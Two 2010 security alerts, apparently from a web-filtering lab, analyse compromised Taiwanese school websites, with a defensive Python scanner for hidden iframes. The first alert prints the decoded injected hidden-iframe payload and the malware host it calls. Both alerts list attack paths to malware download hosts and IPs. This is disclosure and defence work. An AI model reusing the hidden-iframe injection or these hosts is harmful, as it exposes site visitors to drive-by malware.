[ Security Alert ] 24 November, 2010 10:29

     Our lab found a malware executable injected into a university web page; the page has not been fixed yet at this moment. The detailed analysis is given below.

    Attack path:
    [root] hxxp://www.math.ndhu.edu.tw/  (PageRank: 4)
      [virus] hxxp://secure.manualstats20.com/images/5d31b7e88247f0b2f4663ec104293815.php?u=47&s=56179768&c=d& 

    There is an embedded script at the bottom of the homepage.

    After decoding, the original script is as below.

 

    After this script executes, the HTML fragment "<iframe src='http://secure.manualstats20.com/images/d' width='10' height='10' style='visibility: hidden;'></iframe>" is inserted into the homepage: a 10x10 pixel frame, hidden by its style attribute, that loads content from a third-party host.
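    As an added illustration that is not part of the original alert, the following Python scanner flags iframes matching this injection pattern: hidden via a style attribute, with tiny dimensions, or pointing at a host other than the page's own. The sample HTML and the host malicious-host.example are constructed placeholders, not values from the alert.

```python
"""Flag hidden, tiny, or off-site iframes, the injection pattern described above."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SIZE_THRESHOLD = 10  # px; the injected frame in the alert was 10x10

def _is_tiny(value):
    # width/height attribute that parses as a number <= SIZE_THRESHOLD
    m = re.match(r"\s*(\d+)", value or "")
    return m is not None and int(m.group(1)) <= SIZE_THRESHOLD

class HiddenIframeFinder(HTMLParser):
    # Collects <iframe> start tags that are hidden, tiny, or point off-site.
    def __init__(self, page_host=None):
        super().__init__()
        self.page_host = page_host.lower() if page_host else None
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if re.search(r"visibility\s*:\s*hidden|display\s*:\s*none", a.get("style", "").lower()):
            reasons.append("hidden via style")
        for dim in ("width", "height"):
            if _is_tiny(a.get(dim)):
                reasons.append(f"{dim} <= {SIZE_THRESHOLD}px")
        host = urlparse(a.get("src", "")).hostname
        if self.page_host and host and host.lower() != self.page_host:
            reasons.append(f"src on third-party host {host}")
        if reasons:
            self.findings.append({"src": a.get("src", ""), "reasons": reasons})

def scan_html(html, page_host=None):
    # Return the list of suspicious iframes found in `html`.
    parser = HiddenIframeFinder(page_host)
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: one legitimate embed plus one injected hidden frame
# (placeholder host, not the real one from the alert).
SAMPLE_HTML = """<html><body><h1>Department homepage</h1>
<iframe src="/calendar/embed" width="600" height="400"></iframe>
<iframe src='http://malicious-host.example/images/d' width='10' height='10' style='visibility: hidden;'></iframe>
</body></html>"""
```

    Running scan_html(SAMPLE_HTML, page_host="www.example.edu") reports only the second frame, with all three reasons; a relative-src embed of normal size produces no finding.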

    The malware has a medium detection rate on VirusTotal: 14/43 (32.6%) ( http://www.virustotal.com/file-scan/report.html?id=7d6db256e13677c44fcc80ebc1d60b8cac08b98b4bb9766e2733fac70d902fdf-1290470915 )

    The download path has a low detection rate on URLvoid: 1/17 (6%) ( http://www.urlvoid.com/scan/secure.manualstats20.com )

    AegisLab WebGuard has blocked the download path since 2010-11-22.

 

[ Security Alert ] 09 November, 2010 10:11

     In July, we discovered that an elementary school online learning web site had been injected with lots of SEO-poisoned pages, but today we found it was invaded again. The new hopping site is "77.78.247.175", with a zero detection rate in all URL filters, and the final downloaded fake-AV executable also has a low detection rate (16%).

§ Attack path:
[search] http://www.google.com
 [root] hxxp://moodle.wyes.tcc.edu.tw/moodle/k/w/2086161388.php
  [hopping] hxxp://77.78.247.175/index.php?wci...
   [script] hxxp://77.78.247.217/index.php?EB=07...
    [virus] hxxp://77.78.247.217/index.php?85K7=z3qbX

§ Anti-Virus: The final downloaded fake-AV executable has a low detection rate on VT: 7/42 (16.7%)
   ( http://www.virustotal.com/file-scan/report.html?id=c4df34669ed6a6c136e50a36bf0428075cbe369d0eab7de077a384fc7b203991-1289267295 )

§ URL filter: No URL filter stops this hopping site: 0/6 (0.0%)
   ( http://www.virustotal.com/url-scan/report.html?id=a83ce54f73db7e5cf88b7a9d520991c4-1289263966 )
 

AegisLab WebGuard DB has blocked this hopping site since 2010-11-09.

By AegisLab